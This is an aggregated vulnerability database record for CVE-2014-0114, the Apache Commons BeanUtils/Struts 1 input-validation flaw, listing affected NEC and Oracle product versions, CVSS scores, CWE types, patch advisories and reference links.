vendor:日本電気model:infocagescope:eqversion:security risk management v1.0.0 to v1.0.6

Trust: 0.8

vendor:日本電気model:infocagescope:eqversion:security risk management v1.0.0 to v2.1.3

Trust: 0.8

vendor:日本電気model:webotxscope:eqversion:enterprise edition v5.1 to v5.2

Trust: 0.8

vendor:日本電気model:webotxscope:eqversion:enterprise edition v6.1 to v6.5

Trust: 0.8

vendor:日本電気model:webotxscope:eqversion:rfid manager enterprise v7.1

Trust: 0.8

vendor:日本電気model:webotxscope:eqversion:rfid manager lite v2.0

Trust: 0.8

vendor:日本電気model:webotxscope:eqversion:rfid manager standard v2.0

Trust: 0.8

vendor:日本電気model:webotxscope:eqversion:standard edition v5.1 to v5.2

Trust: 0.8

vendor:日本電気model:webotxscope:eqversion:standard edition v6.1 to v6.5

Trust: 0.8

vendor:日本電気model:webotxscope:eqversion:standard-j edition v5.1 to v5.2

Trust: 0.8

vendor:日本電気model:webotxscope:eqversion:standard-j edition v6.1 to v6.5

Trust: 0.8

vendor:日本電気model:webotxscope:eqversion:web edition v5.1 to v5.2

Trust: 0.8

vendor:日本電気model:webotxscope:eqversion:web edition v6.1 to v6.5

Trust: 0.8

vendor:日本電気model:webotxscope:eqversion:application server v7.1

Trust: 0.8

vendor:日本電気model:webotxscope:eqversion:developer v8.2 to v8.4 (with developer's studio only )

Trust: 0.8

vendor:日本電気model:webotxscope:eqversion:developer v9.1 to v9.2 (with developer's studio only )

Trust: 0.8

vendor:日本電気model:webotxscope:eqversion:portal v8.3 to v8.4

Trust: 0.8

vendor:日本電気model:webotxscope:eqversion:portal v9.1

Trust: 0.8

vendor:日本電気model:webotx application serverscope:eqversion:v7.1

Trust: 0.8

vendor:日本電気model:webotx developerscope:eqversion:v8.2 to v8.4 (with developer's studio only )

Trust: 0.8

vendor:日本電気model:webotx developerscope:eqversion:v9.1 to v9.2 (with developer's studio only )

Trust: 0.8

vendor:日本電気model:webotx portalscope:eqversion:v8.3 to v8.4

Trust: 0.8

vendor:日本電気model:webotx portalscope:eqversion:v9.1

Trust: 0.8

vendor:株式会社エヌ ティ ティ データmodel:terasoluna server framework for javascope:lteversion:2.0.0.1 from 2.0.5.1

Trust: 0.8

vendor:オラクルmodel:oracle communications applicationsscope:eqversion:of metasolv solution 6.2.1.0.0

Trust: 0.8

vendor:オラクルmodel:oracle communications applicationsscope:eqversion:of metasolv solution asr: 49.0.0

Trust: 0.8

vendor:オラクルmodel:oracle communications applicationsscope:eqversion:of metasolv solution lsr: 10.1.0

Trust: 0.8

vendor:オラクルmodel:oracle communications applicationsscope:eqversion:of metasolv solution lsr: 9.4.0

Trust: 0.8

vendor:オラクルmodel:oracle fusion middlewarescope:eqversion:of oracle adaptive access manager 11.1.1.5

Trust: 0.8

vendor:オラクルmodel:oracle fusion middlewarescope:eqversion:of oracle adaptive access manager 11.1.1.7

Trust: 0.8

vendor:オラクルmodel:oracle fusion middlewarescope:eqversion:of oracle adaptive access manager 11.1.2.1

Trust: 0.8

vendor:オラクルmodel:oracle fusion middlewarescope:eqversion:of oracle adaptive access manager 11.1.2.2

Trust: 0.8

vendor:オラクルmodel:oracle fusion middlewarescope:eqversion:of oracle enterprise data quality 8.1.2

Trust: 0.8

vendor:オラクルmodel:oracle fusion middlewarescope:eqversion:of oracle enterprise data quality 9.0.11

Trust: 0.8

vendor:オラクルmodel:oracle fusion middlewarescope:eqversion:of oracle jdeveloper 10.1.3.5

Trust: 0.8

vendor:オラクルmodel:oracle fusion middlewarescope:eqversion:of oracle jdeveloper 11.1.1.7

Trust: 0.8

vendor:オラクルmodel:oracle fusion middlewarescope:eqversion:of oracle jdeveloper 11.1.2.4

Trust: 0.8

vendor:オラクルmodel:oracle fusion middlewarescope:eqversion:of oracle jdeveloper 12.1.2.0

Trust: 0.8

vendor:オラクルmodel:oracle fusion middlewarescope:eqversion:of oracle jdeveloper 12.1.3.0

Trust: 0.8

vendor:オラクルmodel:oracle fusion middlewarescope:eqversion:of oracle waveset 8.1.1

Trust: 0.8

vendor:オラクルmodel:oracle fusion middlewarescope:eqversion:of oracle weblogic portal 10.0.1.0

Trust: 0.8

vendor:オラクルmodel:oracle fusion middlewarescope:eqversion:of oracle weblogic portal 10.2.1.0

Trust: 0.8

vendor:オラクルmodel:oracle fusion middlewarescope:eqversion:of oracle weblogic portal 10.3.6.0

Trust: 0.8

vendor:オラクルmodel:oracle fusion middlewarescope:eqversion:of oracle real-time decision server 11.1.1.7 (rtd platform 3.0.x)

Trust: 0.8

vendor:オラクルmodel:oracle identity managerscope:eqversion:11.1.1.5

Trust: 0.8

vendor:オラクルmodel:oracle identity managerscope:eqversion:11.1.1.7

Trust: 0.8

vendor:オラクルmodel:oracle identity managerscope:eqversion:11.1.2.1

Trust: 0.8

vendor:オラクルmodel:oracle identity managerscope:eqversion:11.1.2.2

Trust: 0.8

vendor:オラクルmodel:oracle primavera products suitescope:eqversion:of primavera contract management 13.1

Trust: 0.8

vendor:オラクルmodel:oracle primavera products suitescope:eqversion:of primavera contract management 14.0

Trust: 0.8

vendor:オラクルmodel:oracle primavera products suitescope:eqversion:of primavera p6 enterprise project portfolio management 7.0

Trust: 0.8

vendor:オラクルmodel:oracle primavera products suitescope:eqversion:of primavera p6 enterprise project portfolio management 8.0

Trust: 0.8

vendor:オラクルmodel:oracle primavera products suitescope:eqversion:of primavera p6 enterprise project portfolio management 8.1

Trust: 0.8

vendor:オラクルmodel:oracle primavera products suitescope:eqversion:of primavera p6 enterprise project portfolio management 8.2

Trust: 0.8

vendor:オラクルmodel:oracle primavera products suitescope:eqversion:of primavera p6 enterprise project portfolio management 8.3

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of allocation 10.0

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of allocation 11.0

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of allocation 12.0

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of allocation 13.0

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of allocation 13.1

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of allocation 13.2

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of back office 12.0

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of back office 12.0.9in

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of back office 13.0

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of back office 13.1

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of back office 13.2

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of back office 13.3

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of back office 13.4

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of back office 14.0

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of back office 8.0

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of central office 12.0

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of central office 12.0.9in

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of central office 13.0

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of central office 13.1

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of central office 13.2

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of central office 13.3

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of central office 13.4

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of central office 14.0

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of central office 8.0

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of clearance optimization engine 13.3

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of clearance optimization engine 13.4

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of clearance optimization engine 14.0

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of invoice matching 11.0

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of invoice matching 12.0

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of invoice matching 12.0 in

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of invoice matching 12.1

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of invoice matching 13.0

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of invoice matching 13.1

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of invoice matching 13.2

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of invoice matching 14.0

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of markdown optimization 12.0

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of markdown optimization 13.0

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of markdown optimization 13.1

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of markdown optimization 13.2

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of markdown optimization 13.4

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of returns management 13.1

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of returns management 13.2

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of returns management 13.3

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of returns management 13.4

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of returns management 14.0

Trust: 0.8

vendor:オラクルmodel:oracle retail applicationsscope:eqversion:of returns management 2.0

Trust: 0.8

vendor:オラクルmodel:oracle weblogic serverscope:eqversion:10.0.2.0

Trust: 0.8

vendor:オラクルmodel:oracle weblogic serverscope:eqversion:10.3.6.0

Trust: 0.8

vendor:オラクルmodel:oracle weblogic serverscope:eqversion:12.1.1.0

Trust: 0.8

vendor:オラクルmodel:oracle weblogic serverscope:eqversion:12.1.2.0

Trust: 0.8

vendor:オラクルmodel:oracle weblogic serverscope:eqversion:12.1.3.0

Trust: 0.8

sources: JVNDB: JVNDB-2020-006468 // JVNDB: JVNDB-2014-002308 // NVD: CVE-2014-0114

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2014-0114
value: HIGH

Trust: 1.0

IPA: JVNDB-2020-006468
value: CRITICAL

Trust: 0.8

NVD: CVE-2014-0114
value: HIGH

Trust: 0.8

VULMON: CVE-2014-0114
value: HIGH

Trust: 0.1

nvd@nist.gov: CVE-2014-0114
severity: HIGH
baseScore: 7.5
vectorString: AV:N/AC:L/AU:N/C:P/I:P/A:P
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: PARTIAL
availabilityImpact: PARTIAL
exploitabilityScore: 10.0
impactScore: 6.4
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.9

IPA: JVNDB-2020-006468
baseSeverity: CRITICAL
baseScore: 9.8
vectorString: 3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: NONE
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: HIGH
integrityImpact: HIGH
availabilityImpact: HIGH
exploitabilityScore: NONE
impactScore: NONE
version: 3.0

Trust: 0.8

sources: VULMON: CVE-2014-0114 // JVNDB: JVNDB-2020-006468 // JVNDB: JVNDB-2014-002308 // NVD: CVE-2014-0114

PROBLEMTYPE DATA

problemtype:CWE-20

Trust: 1.0

problemtype:Use of unmaintained third-party components (CWE-1104) [IPA Evaluation ]

Trust: 0.8

problemtype: Path traversal (CWE-22) [IPA Evaluation ]

Trust: 0.8

problemtype: Execution with unnecessary privileges (CWE-250) [IPA Evaluation ]

Trust: 0.8

problemtype: Inappropriate authorization (CWE-285) [IPA Evaluation ]

Trust: 0.8

problemtype: Improper authentication (CWE-287) [IPA Evaluation ]

Trust: 0.8

problemtype: Authentication bypass using alternate path or channel (CWE-288) [IPA Evaluation ]

Trust: 0.8

problemtype: Inappropriate restriction of excessive authentication attempts (CWE-307) [IPA Evaluation ]

Trust: 0.8

problemtype: Unlimited upload of dangerous types of files (CWE-434) [IPA Evaluation ]

Trust: 0.8

problemtype: Inadequate protection of credentials (CWE-522) [IPA Evaluation ]

Trust: 0.8

problemtype: Cross-site scripting (CWE-79) [IPA Evaluation ]

Trust: 0.8

problemtype: Lack of certification (CWE-862) [IPA Evaluation ]

Trust: 0.8

problemtype: Private features (CWE-912) [IPA Evaluation ]

Trust: 0.8

problemtype:Incorrect input confirmation (CWE-20) [NVD Evaluation ]

Trust: 0.8

sources: JVNDB: JVNDB-2020-006468 // JVNDB: JVNDB-2014-002308 // NVD: CVE-2014-0114

THREAT TYPE

remote

Trust: 0.3

sources: PACKETSTORM: 126618 // PACKETSTORM: 149050 // PACKETSTORM: 126525

TYPE

code execution

Trust: 0.2

sources: PACKETSTORM: 126618 // PACKETSTORM: 126525

EXPLOIT AVAILABILITY

sources: VULMON: CVE-2014-0114

PATCH

title:OpenClinic GAurl:https://sourceforge.net/projects/open-clinic/

Trust: 0.8

title:Interstage Navigator Explorer Serverurl:https://issues.apache.org/jira/browse/BEANUTILS-463

Trust: 0.8

title:Red Hat: Important: Red Hat A-MQ Broker 7.5 release and security updateurl:https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories&qid=RHSA-20192995 - Security Advisory

Trust: 0.1

title:Debian CVElist Bug Report Logs: libstruts1.2-java: CVE-2014-0114url:https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs&qid=96f4091aa31a0ece729fdcb110066df5

Trust: 0.1

title:Red Hat: CVE-2014-0114url:https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database&qid=CVE-2014-0114

Trust: 0.1

title:Red Hat: Important: Fuse 7.1 security updateurl:https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories&qid=RHSA-20182669 - Security Advisory

Trust: 0.1

title:IBM: IBM Security Bulletin: Multiple Security Vulnerabilities have been fixed in IBM Security Privileged Identity Manager Appliance.url:https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog&qid=f5bb2b180c7c77e5a02747a1f31830d9

Trust: 0.1

title:Oracle: Oracle Critical Patch Update Advisory - January 2019url:https://vulmon.com/vendoradvisory?qidtp=oracle_advisories&qid=f655264a6935505d167bbf45f409a57b

Trust: 0.1

title:Oracle: Oracle Critical Patch Update Advisory - October 2018url:https://vulmon.com/vendoradvisory?qidtp=oracle_advisories&qid=81c63752a6f26433af2128b2e8c02385

Trust: 0.1

title:Oracle: Oracle Critical Patch Update Advisory - January 2018url:https://vulmon.com/vendoradvisory?qidtp=oracle_advisories&qid=e2a7f287e9acc8c64ab3df71130bc64d

Trust: 0.1

title:IBM: IBM Security Bulletin: IBM has announced a release for IBM Security Identity Governance and Intelligence in response to multiple security vulnerabilitiesurl:https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog&qid=55ea315dfb69fce8383762ac64250315

Trust: 0.1

title:Oracle: Oracle Critical Patch Update Advisory - April 2017url:https://vulmon.com/vendoradvisory?qidtp=oracle_advisories&qid=143b3fb255063c81571469eaa3cf0a87

Trust: 0.1

title:Oracle: Oracle Critical Patch Update Advisory - October 2017url:https://vulmon.com/vendoradvisory?qidtp=oracle_advisories&qid=523d3f220a64ff01dd95e064bd37566a

Trust: 0.1

title:IBM: Security Bulletin: Netcool Operations Insight v1.6.6 contains fixes for multiple security vulnerabilities.url:https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog&qid=68c6989b84f14aaac220c13b754c7702

Trust: 0.1

title:Oracle: Oracle Critical Patch Update Advisory - January 2015url:https://vulmon.com/vendoradvisory?qidtp=oracle_advisories&qid=4a692d6d60aa31507cb101702b494c51

Trust: 0.1

title:Oracle: Oracle Critical Patch Update Advisory - October 2016url:https://vulmon.com/vendoradvisory?qidtp=oracle_advisories&qid=05aabe19d38058b7814ef5514aab4c0c

Trust: 0.1

title:Oracle: Oracle Critical Patch Update Advisory - July 2018url:https://vulmon.com/vendoradvisory?qidtp=oracle_advisories&qid=5f8c525f1408011628af1792207b2099

Trust: 0.1

title:struts1-patchurl:https://github.com/ricedu/struts1-patch

Trust: 0.1

title: - url:https://github.com/weblegacy/struts1

Trust: 0.1

title:struts1filterurl:https://github.com/rgielen/struts1filter

Trust: 0.1

title:StrutsExampleurl:https://github.com/vikasvns2000/StrutsExample

Trust: 0.1

title:struts-miniurl:https://github.com/bingcai/struts-mini

Trust: 0.1

title:strutt-cve-2014-0114url:https://github.com/anob3it/strutt-cve-2014-0114

Trust: 0.1

title:super-pomurl:https://github.com/ian4hu/super-pom

Trust: 0.1

sources: VULMON: CVE-2014-0114 // JVNDB: JVNDB-2020-006468 // JVNDB: JVNDB-2014-002308

EXTERNAL IDS

db:NVDid:CVE-2014-0114

Trust: 3.4

db:ICS CERTid:ICSMA-20-184-01

Trust: 1.6

db:SECUNIAid:59480

Trust: 1.0

db:SECUNIAid:59014

Trust: 1.0

db:SECUNIAid:60703

Trust: 1.0

db:SECUNIAid:59464

Trust: 1.0

db:SECUNIAid:59246

Trust: 1.0

db:SECUNIAid:59718

Trust: 1.0

db:SECUNIAid:57477

Trust: 1.0

db:SECUNIAid:59228

Trust: 1.0

db:SECUNIAid:58710

Trust: 1.0

db:SECUNIAid:59245

Trust: 1.0

db:SECUNIAid:60177

Trust: 1.0

db:SECUNIAid:59479

Trust: 1.0

db:SECUNIAid:59118

Trust: 1.0

db:SECUNIAid:58851

Trust: 1.0

db:SECUNIAid:59704

Trust: 1.0

db:SECUNIAid:58947

Trust: 1.0

db:SECUNIAid:59430

Trust: 1.0

db:OPENWALLid:OSS-SECURITY/2014/06/15/10

Trust: 1.0

db:OPENWALLid:OSS-SECURITY/2014/07/08/1

Trust: 1.0

db:BIDid:67121

Trust: 1.0

db:JVNid:JVNVU96290700

Trust: 0.8

db:JVNDBid:JVNDB-2020-006468

Trust: 0.8

db:JVNDBid:JVNDB-2014-000056

Trust: 0.8

db:JVNDBid:JVNDB-2014-002308

Trust: 0.8

db:VULMONid:CVE-2014-0114

Trust: 0.1

db:PACKETSTORMid:126618

Trust: 0.1

db:PACKETSTORMid:127957

Trust: 0.1

db:PACKETSTORMid:149050

Trust: 0.1

db:PACKETSTORMid:126525

Trust: 0.1

db:PACKETSTORMid:128873

Trust: 0.1

db:PACKETSTORMid:139721

Trust: 0.1

db:PACKETSTORMid:126811

Trust: 0.1

sources: VULMON: CVE-2014-0114 // PACKETSTORM: 126618 // PACKETSTORM: 127957 // PACKETSTORM: 149050 // PACKETSTORM: 126525 // PACKETSTORM: 128873 // PACKETSTORM: 139721 // PACKETSTORM: 126811 // JVNDB: JVNDB-2020-006468 // JVNDB: JVNDB-2014-002308 // NVD: CVE-2014-0114

REFERENCES

url:https://security.netapp.com/advisory/ntap-20180629-0006/

Trust: 1.0

url:http://seclists.org/fulldisclosure/2014/dec/23

Trust: 1.0

url:https://lists.apache.org/thread.html/c7e31c3c90b292e0bafccc4e1b19c9afc1503a65d82cb7833dfd7478%40%3cissues.commons.apache.org%3e

Trust: 1.0

url:http://www-01.ibm.com/support/docview.wss?uid=swg21675898

Trust: 1.0

url:http://www.vmware.com/security/advisories/vmsa-2014-0008.html

Trust: 1.0

url:https://access.redhat.com/errata/rhsa-2018:2669

Trust: 1.0

url:http://www.vmware.com/security/advisories/vmsa-2014-0012.html

Trust: 1.0

url:https://lists.apache.org/thread.html/df1c385f2112edffeff57a6b21d12e8d24031a9f578cb8ba22a947a8%40%3cissues.commons.apache.org%3e

Trust: 1.0

url:https://lists.apache.org/thread.html/6afe2f935493e69a332b9c5a4f23cafe95c15ede1591a492cf612293%40%3cissues.commons.apache.org%3e

Trust: 1.0

url:https://lists.apache.org/thread.html/88c497eead24ed517a2bb3159d3dc48725c215e97fe7a98b2cf3ea25%40%3cdev.commons.apache.org%3e

Trust: 1.0

url:https://lists.apache.org/thread.html/ebc4f019798f6ce2a39f3e0c26a9068563a9ba092cdf3ece398d4e2f%40%3cnotifications.commons.apache.org%3e

Trust: 1.0

url:https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html

Trust: 1.0

url:https://lists.apache.org/thread.html/6b30629b32d020c40d537f00b004d281c37528d471de15ca8aec2cd4%40%3cissues.commons.apache.org%3e

Trust: 1.0

url:https://lists.apache.org/thread.html/09981ae3df188a2ad1ce20f62ef76a5b2d27cf6b9ebab366cf1d6cc6%40%3cissues.commons.apache.org%3e

Trust: 1.0

url:http://secunia.com/advisories/59246

Trust: 1.0

url:http://secunia.com/advisories/57477

Trust: 1.0

url:https://lists.apache.org/thread.html/708d94141126eac03011144a971a6411fcac16d9c248d1d535a39451%40%3csolr-user.lucene.apache.org%3e

Trust: 1.0

url:http://secunia.com/advisories/59480

Trust: 1.0

url:https://lists.apache.org/thread.html/d27c51b3c933f885460aa6d3004eb228916615caaaddbb8e8bfeeb40%40%3cgitbox.activemq.apache.org%3e

Trust: 1.0

url:https://lists.apache.org/thread.html/37e1ed724a1b0e5d191d98c822c426670bdfde83804567131847d2a3%40%3cdevnull.infra.apache.org%3e

Trust: 1.0

url:http://www-01.ibm.com/support/docview.wss?uid=swg21675689

Trust: 1.0

url:http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html

Trust: 1.0

url:https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe%40%3ccommits.druid.apache.org%3e

Trust: 1.0

url:http://www.securityfocus.com/bid/67121

Trust: 1.0

url:http://openwall.com/lists/oss-security/2014/07/08/1

Trust: 1.0

url:https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc%40%3cissues.drill.apache.org%3e

Trust: 1.0

url:https://lists.apache.org/thread.html/r75d67108e557bb5d4c4318435067714a0180de525314b7e8dab9d04e%40%3cissues.activemq.apache.org%3e

Trust: 1.0

url:http://secunia.com/advisories/59718

Trust: 1.0

url:http://www-01.ibm.com/support/docview.wss?uid=swg27042296

Trust: 1.0

url:http://www-01.ibm.com/support/docview.wss?uid=swg21674812

Trust: 1.0

url:http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html

Trust: 1.0

url:http://www-01.ibm.com/support/docview.wss?uid=swg21675266

Trust: 1.0

url:https://issues.apache.org/jira/browse/beanutils-463

Trust: 1.0

url:https://lists.apache.org/thread.html/3f500972dceb48e3cb351f58565aecf6728b1ea7a69593af86c30b30%40%3cissues.activemq.apache.org%3e

Trust: 1.0

url:https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05324755

Trust: 1.0

url:https://lists.apache.org/thread.html/c70da3cb6e3f03e0ad8013e38b6959419d866c4a7c80fdd34b73f25c%40%3ccommits.pulsar.apache.org%3e

Trust: 1.0

url:https://access.redhat.com/solutions/869353

Trust: 1.0

url:https://lists.apache.org/thread.html/080af531a9113e29d3f6a060e3f992dc9f40315ec7234e15c3b339e3%40%3cissues.commons.apache.org%3e

Trust: 1.0

url:http://www.oracle.com/technetwork/topics/security/cpuoct2014-1972960.html

Trust: 1.0

url:http://www-01.ibm.com/support/docview.wss?uid=swg21676110

Trust: 1.0

url:http://www.securityfocus.com/archive/1/534161/100/0/threaded

Trust: 1.0

url:http://www-01.ibm.com/support/docview.wss?uid=swg21677110

Trust: 1.0

url:https://lists.apache.org/thread.html/918ec15a80fc766ff46c5d769cb8efc88fed6674faadd61a7105166b%40%3cannounce.apache.org%3e

Trust: 1.0

url:https://lists.apache.org/thread.html/40fc236a35801a535cd49cf1979dbeab034b833c63a284941bce5bf1%40%3cdev.commons.apache.org%3e

Trust: 1.0

url:https://lists.apache.org/thread.html/cee6b1c4533be1a753614f6a7d7c533c42091e7cafd7053b8f62792a%40%3cissues.commons.apache.org%3e

Trust: 1.0

url:http://secunia.com/advisories/60703

Trust: 1.0

url:https://lists.apache.org/thread.html/rf5230a049d989dbfdd404b4320a265dceeeba459a4d04ec21873bd55%40%3csolr-user.lucene.apache.org%3e

Trust: 1.0

url:https://lists.apache.org/thread.html/aa4ca069c7aea5b1d7329bc21576c44a39bcc4eb7bb2760c4b16f2f6%40%3cissues.commons.apache.org%3e

Trust: 1.0

url:http://secunia.com/advisories/59464

Trust: 1.0

url:http://secunia.com/advisories/59245

Trust: 1.0

url:http://marc.info/?l=bugtraq&m=140119284401582&w=2

Trust: 1.0

url:http://www-01.ibm.com/support/docview.wss?uid=swg21676931

Trust: 1.0

url:https://lists.apache.org/thread.html/fda473f46e51019a78ab217a7a3a3d48dafd90846e75bd5536ef72f3%40%3cnotifications.commons.apache.org%3e

Trust: 1.0

url:https://lists.apache.org/thread.html/9b5505632f5683ee17bda4f7878525e672226c7807d57709283ffa64%40%3cissues.commons.apache.org%3e

Trust: 1.0

url:https://lists.apache.org/thread.html/8e2bdfabd5b14836aa3cf900aa0a62ff9f4e22a518bb4e553ebcf55f%40%3cissues.commons.apache.org%3e

Trust: 1.0

url:http://www-01.ibm.com/support/docview.wss?uid=swg21674128

Trust: 1.0

url:https://lists.apache.org/thread.html/2ba22f2e3de945039db735cf6cbf7f8be901ab2537337c7b1dd6a0f0%40%3cissues.commons.apache.org%3e

Trust: 1.0

url:http://marc.info/?l=bugtraq&m=141451023707502&w=2

Trust: 1.0

url:https://bugzilla.redhat.com/show_bug.cgi?id=1116665

Trust: 1.0

url:https://lists.apache.org/thread.html/0340493a1ddf3660dee09a5c503449cdac5bec48cdc478de65858859%40%3cdev.commons.apache.org%3e

Trust: 1.0

url:https://lists.apache.org/thread.html/869c08899f34c1a70c9fb42f92ac0d043c98781317e0c19d7ba3f5e3%40%3cissues.commons.apache.org%3e

Trust: 1.0

url:http://secunia.com/advisories/59118

Trust: 1.0

url:https://lists.apache.org/thread.html/df093c662b5e49fe9e38ef91f78ffab09d0839dea7df69a747dffa86%40%3cdev.commons.apache.org%3e

Trust: 1.0

url:https://bugzilla.redhat.com/show_bug.cgi?id=1091938

Trust: 1.0

url:http://secunia.com/advisories/59704

Trust: 1.0

url:http://www.debian.org/security/2014/dsa-2940

Trust: 1.0

url:http://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html

Trust: 1.0

url:https://lists.apache.org/thread.html/c24c0b931632a397142882ba248b7bd440027960f22845c6f664c639%40%3ccommits.commons.apache.org%3e

Trust: 1.0

url:http://marc.info/?l=bugtraq&m=140801096002766&w=2

Trust: 1.0

url:https://lists.apache.org/thread.html/31f9dc2c9cb68e390634a4202f84b8569f64b6569bfcce46348fd9fd%40%3ccommits.commons.apache.org%3e

Trust: 1.0

url:https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html

Trust: 1.0

url:http://www.mandriva.com/security/advisories?name=mdvsa-2014:095

Trust: 1.0

url:https://lists.apache.org/thread.html/15fcdf27fa060de276edc0b4098526afc21c236852eb3de9be9594f3%40%3cissues.commons.apache.org%3e

Trust: 1.0

url:http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html

Trust: 1.0

url:http://www-01.ibm.com/support/docview.wss?uid=swg21676091

Trust: 1.0

url:https://access.redhat.com/errata/rhsa-2019:2995

Trust: 1.0

url:https://lists.apache.org/thread.html/r204ba2a9ea750f38d789d2bb429cc0925ad6133deea7cbc3001d96b5%40%3csolr-user.lucene.apache.org%3e

Trust: 1.0

url:https://lists.apache.org/thread.html/ffde3f266d3bde190b54c9202169e7918a92de7e7e0337d792dc7263%40%3cissues.commons.apache.org%3e

Trust: 1.0

url:https://lists.apache.org/thread.html/65b39fa6d700e511927e5668a4038127432178a210aff81500eb36e5%40%3cissues.commons.apache.org%3e

Trust: 1.0

url:http://secunia.com/advisories/58710

Trust: 1.0

url:https://lists.apache.org/thread.html/97fc033dad4233a5d82fcb75521eabdd23dd99ef32eb96f407f96a1a%40%3cissues.commons.apache.org%3e

Trust: 1.0

url:http://openwall.com/lists/oss-security/2014/06/15/10

Trust: 1.0

url:http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html

Trust: 1.0

url:http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html

Trust: 1.0

url:https://lists.apache.org/thread.html/0efed939139f5b9dcd62b8acf7cb8a9789227d14abdc0c6f141c4a4c%40%3cissues.activemq.apache.org%3e

Trust: 1.0

url:http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html

Trust: 1.0

url:https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f%40%3cdev.drill.apache.org%3e

Trust: 1.0

url:https://security.gentoo.org/glsa/201607-09

Trust: 1.0

url:https://lists.apache.org/thread.html/42ad6326d62ea8453d0d0ce12eff39bbb7c5b4fca9639da007291346%40%3cissues.commons.apache.org%3e

Trust: 1.0

url:http://secunia.com/advisories/59479

Trust: 1.0

url:http://lists.fedoraproject.org/pipermail/package-announce/2014-august/136958.html

Trust: 1.0

url:http://www.ibm.com/support/docview.wss?uid=swg21675496

Trust: 1.0

url:https://lists.apache.org/thread.html/f3682772e62926b5c009eed63c62767021be6da0bb7427610751809f%40%3cissues.commons.apache.org%3e

Trust: 1.0

url:https://security.netapp.com/advisory/ntap-20140911-0001/

